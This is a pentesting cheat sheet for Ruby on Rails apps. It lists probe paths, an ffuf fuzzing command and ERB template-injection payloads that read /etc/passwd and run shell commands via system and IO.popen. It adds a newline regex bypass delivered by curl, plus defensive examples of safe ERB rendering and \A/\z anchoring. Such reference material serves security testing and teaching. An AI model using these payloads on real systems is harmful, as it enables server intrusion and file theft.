# Ruby on Rails Pentesting

Ruby on Rails is a web application framework written in Ruby.

### Common Directories <a href="#common-directories" id="common-directories"></a>

```
/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes
```

In addition, it is worth fuzzing under the **`/rails/`** directory, for example:

```
ffuf -u https://example.com/rails/FUZZ -w wordlist.txt
```

### ERB Template Injection <a href="#erb-template-injection" id="erb-template-injection"></a>

If the target website renders user-controlled input through an **ERB** template, we can inject template expressions that are evaluated on the server.

```
require 'erb'

# The text is compiled as an ERB template, so the <%= %> tag is evaluated
text = "<%= 2*3 %>"
result = ERB.new(text).result(binding)
puts result

# expected result: 6
```
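As an added example (not code from the original page), the snippet below shows the two rendering patterns side by side: the vulnerable one splices user text into the template source, the hardened one keeps the template fixed and passes the user value in through the binding. `USER_INPUT`, `render_vulnerable` and `render_safe` are constructed names for this illustration.

```ruby
require 'erb'

# Added example, not from the original page. Demonstrates why ERB injection
# happens and how to render the same page without it.
# USER_INPUT is a constructed sample value.
USER_INPUT = "<%= 2*3 %>".freeze

# Vulnerable: user text is spliced into the template SOURCE, so ERB compiles
# and executes any <%= ... %> tag it contains before rendering.
def render_vulnerable(user_input)
  template = "Hello, #{user_input}!"
  ERB.new(template).result(binding)
end

# Hardened: the template source is a fixed string written by the developer;
# user input reaches the template only as a local variable (`name`) in the
# binding, so its contents are never compiled as Ruby. html_escape also
# neutralises it for the HTML context it is rendered into.
def render_safe(user_input)
  name = user_input
  template = "Hello, <%= ERB::Util.html_escape(name) %>!"
  ERB.new(template).result(binding)
end

if __FILE__ == $PROGRAM_NAME
  puts render_vulnerable(USER_INPUT) # the expression ran on the server
  puts render_safe(USER_INPUT)       # the tag is shown as literal text
end
```

In a Rails application the same distinction applies to `render inline:` with interpolated strings versus a view file with instance variables; the fix is always to keep user data out of the template source.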

#### Payloads <a href="#payloads" id="payloads"></a>

Reference: [Server Side Template Injection](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md)

```
<%= 2*3 %>

<%= self.methods %>
<%= self.method(:handle_POST).parameters %>

<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>

<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>
```

#### Regex Check Bypass <a href="#regex-check-bypass" id="regex-check-bypass"></a>

Reference: <https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/>

```
abc\n<%- 2*3 %>
```

We can also use the **`curl`** command when the payload contains a newline.\
Below is an example using the URL-encoded form of the payload **`<%= IO.popen('ls /').readlines() %>`**.

```
curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'
```
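To show why the newline trick in the regex check bypass above works and what closes it, here is an added example (not from the original page or the referenced article). In Ruby, `^` and `$` are line anchors, while `\A` and `\z` anchor the whole string. `allowed_line_anchored?`, `allowed_string_anchored?` and the input constants are constructed names and values for this illustration.

```ruby
# Added example, not from the original page. Shows why a Ruby validator
# built on ^ and $ is bypassed by a newline, and the anchors that close
# the hole. Inputs are constructed sample values.
INPUT_CLEAN     = "abc".freeze
INPUT_MULTILINE = "abc\n<%- 2*3 %>".freeze   # the bypass payload from above

# Weak check: in Ruby, ^ and $ match at the start and end of every LINE,
# so only the first line ("abc") has to satisfy the pattern.
def allowed_line_anchored?(input)
  input.match?(/^[a-z0-9]+$/)
end

# Fixed check: \A and \z anchor to the start and end of the whole STRING,
# so a newline anywhere in the input makes the match fail. (\Z would still
# tolerate one trailing newline; \z does not.)
def allowed_string_anchored?(input)
  input.match?(/\A[a-z0-9]+\z/)
end

if __FILE__ == $PROGRAM_NAME
  [INPUT_CLEAN, INPUT_MULTILINE].each do |s|
    puts "#{s.inspect}: line-anchored=#{allowed_line_anchored?(s)} " \
         "string-anchored=#{allowed_string_anchored?(s)}"
  end
end
```

Rails `validates :field, format: { with: /^...$/ }` raises an error for exactly this reason unless `multiline: true` is passed; prefer `\A` and `\z` in any format validation.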

### References <a href="#references" id="references"></a>

* [OWASP Cheat Sheet Series](https://cheatsheetseries.owasp.org/cheatsheets/Ruby_on_Rails_Cheat_Sheet.html)
